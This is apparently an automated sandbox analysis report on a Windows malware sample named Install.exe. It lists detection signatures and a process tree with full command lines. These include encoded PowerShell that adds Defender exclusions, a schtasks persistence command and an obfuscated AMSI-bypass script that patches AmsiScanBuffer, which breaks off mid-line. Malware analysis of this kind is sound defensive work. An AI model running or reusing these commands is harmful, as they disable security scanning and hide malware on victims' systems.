Edit tour
Windows
Analysis Report
Install.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Uses nslookup.exe to query domains
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Creates a thread in another existing process (thread injection)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Found suspicious powershell code related to unpacking or dynamic code loading
Writes to foreign memory regions
.NET source code references suspicious native API functions
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Creates job files (autostart)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Classification
- System is w10x64
- Install.exe (PID: 6752 cmdline:
"C:\Users\ user\Deskt op\Install .exe" MD5: 280BFD5EA1F41586EA0EF60EE44BC8DB) - ChiefKeefofficialnaxyi_crypted(6).exe (PID: 6820 cmdline:
C:\Users\u ser\AppDat a\Roaming\ ChiefKeefo fficialnax yi_crypted (6).exe MD5: D55DC38B4EE6BED2168E74194533C572) - conhost.exe (PID: 6828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - AppLaunch.exe (PID: 6900 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\AppL aunch.exe MD5: 6807F903AC06FF7E1670181378690B22) - 34432.exe (PID: 6836 cmdline:
C:\Users\u ser\AppDat a\Roaming\ 34432.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C) - cmd.exe (PID: 7012 cmdline:
"cmd" cmd /c powersh ell -Encod edCommand "QQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgAC0AR QB4AGMAbAB 1AHMAaQBvA G4AUABhAHQ AaAAgAEAAK AAkAGUAbgB 2ADoAVQBzA GUAcgBQAHI AbwBmAGkAb ABlACwAJAB lAG4AdgA6A FMAeQBzAHQ AZQBtAEQAc gBpAHYAZQA pACAALQBGA G8AcgBjAGU A" & power shell -Enc odedComman d "QQBkAGQ ALQBNAHAAU AByAGUAZgB lAHIAZQBuA GMAZQAgAC0 ARQB4AGMAb AB1AHMAaQB vAG4ARQB4A HQAZQBuAHM AaQBvAG4AI ABAACgAJwB lAHgAZQAnA CwAJwBkAGw AbAAnACkAI AAtAEYAbwB yAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 7048 cmdline:
powershell -EncodedC ommand "QQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgAC0ARQB4 AGMAbAB1AH MAaQBvAG4A UABhAHQAaA AgAEAAKAAk AGUAbgB2AD oAVQBzAGUA cgBQAHIAbw BmAGkAbABl ACwAJABlAG 4AdgA6AFMA eQBzAHQAZQ BtAEQAcgBp AHYAZQApAC AALQBGAG8A cgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 6856 cmdline:
powershell -EncodedC ommand "QQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgAC0ARQB4 AGMAbAB1AH MAaQBvAG4A RQB4AHQAZQ BuAHMAaQBv AG4AIABAAC gAJwBlAHgA ZQAnACwAJw BkAGwAbAAn ACkAIAAtAE YAbwByAGMA ZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913) - nslookup.exe (PID: 7056 cmdline:
C:\Windows \System32\ nslookup.e xe MD5: AF1787F1DBE0053D74FC687E7233F8CE) - cmd.exe (PID: 5412 cmdline:
cmd" /c sc htasks /cr eate /f /s c onlogon /rl highes t /tn "chr ome" /tr " C:\Users\u ser\AppDat a\Roaming\ Chrome\chr ome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1584 cmdline:
schtasks / create /f /sc onlogo n /rl high est /tn "c hrome" /tr "C:\Users \user\AppD ata\Roamin g\Chrome\c hrome.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - cmd.exe (PID: 6552 cmdline:
cmd" cmd / c "C:\User s\user\App Data\Roami ng\Chrome\ chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - chrome.exe (PID: 5460 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Chrome\chr ome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C) - cmd.exe (PID: 6892 cmdline:
"cmd" cmd /c powersh ell -Encod edCommand "QQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgAC0AR QB4AGMAbAB 1AHMAaQBvA G4AUABhAHQ AaAAgAEAAK AAkAGUAbgB 2ADoAVQBzA GUAcgBQAHI AbwBmAGkAb ABlACwAJAB lAG4AdgA6A FMAeQBzAHQ AZQBtAEQAc gBpAHYAZQA pACAALQBGA G8AcgBjAGU A" & power shell -Enc odedComman d "QQBkAGQ ALQBNAHAAU AByAGUAZgB lAHIAZQBuA GMAZQAgAC0 ARQB4AGMAb AB1AHMAaQB vAG4ARQB4A HQAZQBuAHM AaQBvAG4AI ABAACgAJwB lAHgAZQAnA CwAJwBkAGw AbAAnACkAI AAtAEYAbwB yAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5728 cmdline:
powershell -EncodedC ommand "QQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgAC0ARQB4 AGMAbAB1AH MAaQBvAG4A UABhAHQAaA AgAEAAKAAk AGUAbgB2AD oAVQBzAGUA cgBQAHIAbw BmAGkAbABl ACwAJABlAG 4AdgA6AFMA eQBzAHQAZQ BtAEQAcgBp AHYAZQApAC AALQBGAG8A cgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6372 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.EXE "f unction Lo cal:oBYZxp oBuJDg{Par am([Output Type([Type ])][Parame ter(Positi on=0)][Typ e[]]$hCPAJ CDcAnFqJq, [Parameter (Position= 1)][Type]$ NibVxWxTFc )$qKHXRLjx cQb=[AppDo main]::Cur rentDomain .DefineDyn amicAssemb ly((New-Ob ject Refle ction.Asse mblyName(' ReflectedD elegate')) ,[Reflecti on.Emit.As semblyBuil derAccess] ::Run).Def ineDynamic Module('In Me'+'mory' +'Module', $False).De fineType(' MyDelegate Type','Cla ss,Public, Sealed,Ans iClass,Aut oClass',[M ulticastDe legate]);$ qKHXRLjxcQ b.DefineCo nstructor( 'RTSpecial Name,HideB ySig,Publi c',[Reflec tion.Calli ngConventi ons]::Stan dard,$hCPA JCDcAnFqJq ).SetImple mentationF lags('Runt ime,Manage d');$qKHXR LjxcQb.Def ineMethod( 'Invoke',' Public,Hid eBySig,New Slot,Virtu al',$NibVx WxTFc,$hCP AJCDcAnFqJ q).SetImpl ementation Flags('Run time,Manag ed');Write -Output $q KHXRLjxcQb .CreateTyp e();}$uYKr ZWxknTiUv= ([AppDomai n]::Curren tDomain.Ge tAssemblie s()|Where- Object{$_. GlobalAsse mblyCache -And $_.Lo cation.Spl it('\')[-1 ].Equals(' System.dll ')}).GetTy pe('Micros oft.Win32. '+'Uns'+'a feNat'+'iv eMetho'+'d s');$SpNyf ScDlNPPHB= $uYKrZWxkn TiUv.GetMe thod('Ge'+ 'tPr'+'ocA dd'+'ress' ,[Reflecti on.Binding Flags]'Pub lic,Static ',$Null,[R eflection. CallingCon ventions]: :Any,@((Ne w-Object I ntPtr).Get Type(),[st ring]),$Nu ll);$RRmRt bQVOsCwqbt FCRP=oBYZx poBuJDg @( [String])( [IntPtr]); $CSrLsWTvU KtnfJeCoYn QHQ=oBYZxp oBuJDg @([ IntPtr],[U IntPtr],[U Int32],[UI nt32].Make ByRefType( ))([Bool]) ;$LbwxtlPJ WDL=$uYKrZ WxknTiUv.G etMethod(' Get'+'Modu '+'leHan'+ 'dle').Inv oke($Null, @([Object] ('kern'+'e l'+'32.dll ')));$Usbt vKZkuSsHuw =$SpNyfScD lNPPHB.Inv oke($Null, @([Object] $LbwxtlPJW DL,[Object ]('Load'+' LibraryA') ));$GBWVSx TZRtiWMYLE L=$SpNyfSc DlNPPHB.In voke($Null ,@([Object ]$LbwxtlPJ WDL,[Objec t]('Vir'+' tual'+'Pro '+'tect')) );$zcmbglj =[Runtime. InteropSer vices.Mars hal]::GetD elegateFor FunctionPo inter($Usb tvKZkuSsHu w,$RRmRtbQ VOsCwqbtFC RP).Invoke ('a'+'m'+' si.dll');$ NtWqUAjxRF zIehWzj=$S pNyfScDlNP PHB.Invoke ($Null,@([ Object]$zc mbglj,[Obj ect]('Ams' +'iSc'+'an '+'Buffer' )));$QZnCE HiAlz=0;[R untime.Int eropServic es.Marshal ]::GetDele gateForFun ctionPoint er($GBWVSx TZRtiWMYLE L,$CSrLsWT vUKtnfJeCo YnQHQ).Inv oke($NtWqU AjxRFzIehW zj,[uint32 ]8,4,[ref] $QZnCEHiAl z);[Runtim e.InteropS ervices.Ma rshal]::Co py([Byte[] ](0xb8,0x5 7,0,7,0x80 ,0xc2,0x18 ,0),0,$NtW qUAjxRFzIe hWzj,8);[R untime.Int eropServic es.Marshal ]::GetDele gateForFun ctionPoint er($GBWVSx TZRtiWMYLE L,$CSrLsWT vUKtnfJeCo YnQHQ).Inv oke($NtWqU AjxRFzIehW zj,[uint32 ]8,0x20,[r ef]$QZnCEH iAlz);[Ref lection.As sembly]::L oad([Micro soft.Win32